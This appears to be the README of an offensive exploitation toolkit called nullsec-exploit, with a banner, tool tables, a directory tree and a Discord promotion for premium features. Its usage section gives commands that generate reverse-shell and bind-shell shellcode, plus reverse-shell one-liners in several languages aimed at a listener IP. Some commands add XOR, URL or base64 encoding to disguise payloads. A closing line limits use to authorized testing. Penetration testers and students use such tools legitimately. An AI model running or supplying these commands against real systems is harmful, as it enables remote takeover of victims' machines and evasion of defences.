███▄ █ █ ██ ██▓ ██▓ ██████ ▓█████ ▄████▄
██ ▀█ █ ██ ▓██▒▓██▒ ▓██▒ ▒██ ▒ ▓█ ▀ ▒██▀ ▀█
▓██ ▀█ ██▒▓██ ▒██░▒██░ ▒██░ ░ ▓██▄ ▒███ ▒▓█ ▄
▓██▒ ▐▌██▒▓▓█ ░██░▒██░ ▒██░ ▒ ██▒▒▓█ ▄ ▒▓▓▄ ▄██▒
▒██░ ▓██░▒▒█████▓ ░██████▒░██████▒▒██████▒▒░▒████▒▒ ▓███▀ ░
░ ▒░ ▒ ▒ ░▒▓▒ ▒ ▒ ░ ▒░▓ ░░ ▒░▓ ░▒ ▒▓▒ ▒ ░░░ ▒░ ░░ ░▒ ▒ ░
░ ░ ░ ░ ░ ░ ░ ░ ░
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
█░░░░░░░░░░░░░░░░ E X P L O I T ░░░░░░░░░░░░░░░░░░░░░░░░░░░█
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
bad-antics
🔓 Join discord.gg/killers for premium features!
| Tool | Language | Description | Free | Premium |
|---|---|---|---|---|
| shellgen | Python | Shellcode generator | ✅ | 🔥 |
| payloader | Python | Multi-platform payloads | ✅ | 🔥 |
| ropfinder | C | ROP gadget finder | ❌ | 🔥 |
| encoder | Python | Payload encoding/obfuscation | ✅ | 🔥 |
| revshell | Python | Reverse shell generator | ✅ | 🔥 |
| bofgen | C | Buffer overflow skeleton | ❌ | 🔥 |
nullsec-exploit/
├── c/
│ ├── ropfinder/ # ROP gadget finder
│ ├── bofgen/ # BOF exploit generator
│ └── shellcode/ # Raw shellcode templates
├── python/
│ ├── shellgen.py # Shellcode generator
│ ├── payloader.py # Payload generator
│ ├── encoder.py # Encoding utilities
│ └── revshell.py # Reverse shell gen
├── asm/
│ ├── linux_x64/ # Linux x64 shellcode
│ ├── linux_x86/ # Linux x86 shellcode
│ ├── windows_x64/ # Windows x64 shellcode
│ └── windows_x86/ # Windows x86 shellcode
└── templates/
├── exploits/ # Exploit templates
└── payloads/ # Payload templates
| Type | x86 | x64 | Description |
|---|---|---|---|
| exec | ✅ | ✅ | Execute command |
| bind | ✅ | ✅ | Bind shell |
| reverse | ✅ | ✅ | Reverse shell |
| meterpreter | ❌ | ✅ | Meterpreter stage |
| Type | x86 | x64 | Description |
|---|---|---|---|
| exec | ✅ | ✅ | Execute command |
| bind | ✅ | ✅ | Bind shell |
| reverse | ✅ | ✅ | Reverse TCP |
| messagebox | ✅ | ✅ | MessageBox PoC |
# Generate reverse shell shellcode
python3 shellgen.py -t reverse -l 192.168.1.100 -p 4444 -a x64 -o linux
# Generate encoded payload
python3 encoder.py -i shellcode.bin -e xor -k 0x41 -o encoded.bin
# Generate one-liner reverse shells
python3 revshell.py -l 192.168.1.100 -p 4444 --all
# Find ROP gadgets
./ropfinder -f /lib/x86_64-linux-gnu/libc.so.6 -o gadgets.txt# Linux x64 reverse shell
python3 shellgen.py -t reverse -l 10.0.0.1 -p 4444 -a x64 -o linux
# Windows x86 bind shell
python3 shellgen.py -t bind -p 4444 -a x86 -o windows
# With encoding
python3 shellgen.py -t exec -c "id" -a x64 -o linux -e xor
# Output formats
python3 shellgen.py -t reverse -l 10.0.0.1 -p 4444 --format c
python3 shellgen.py -t reverse -l 10.0.0.1 -p 4444 --format python
python3 shellgen.py -t reverse -l 10.0.0.1 -p 4444 --format rawSupports:
- Bash
- Python
- PHP
- Perl
- Ruby
- Netcat
- PowerShell
- Java
- Groovy
# Generate all reverse shells
python3 revshell.py -l 10.0.0.1 -p 4444 --all
# Specific language
python3 revshell.py -l 10.0.0.1 -p 4444 -t python
# URL encoded (for web)
python3 revshell.py -l 10.0.0.1 -p 4444 -t bash --urlencode
# Base64 encoded
python3 revshell.py -l 10.0.0.1 -p 4444 -t powershell --base64For authorized security testing only. Creating and using exploits without authorization is illegal.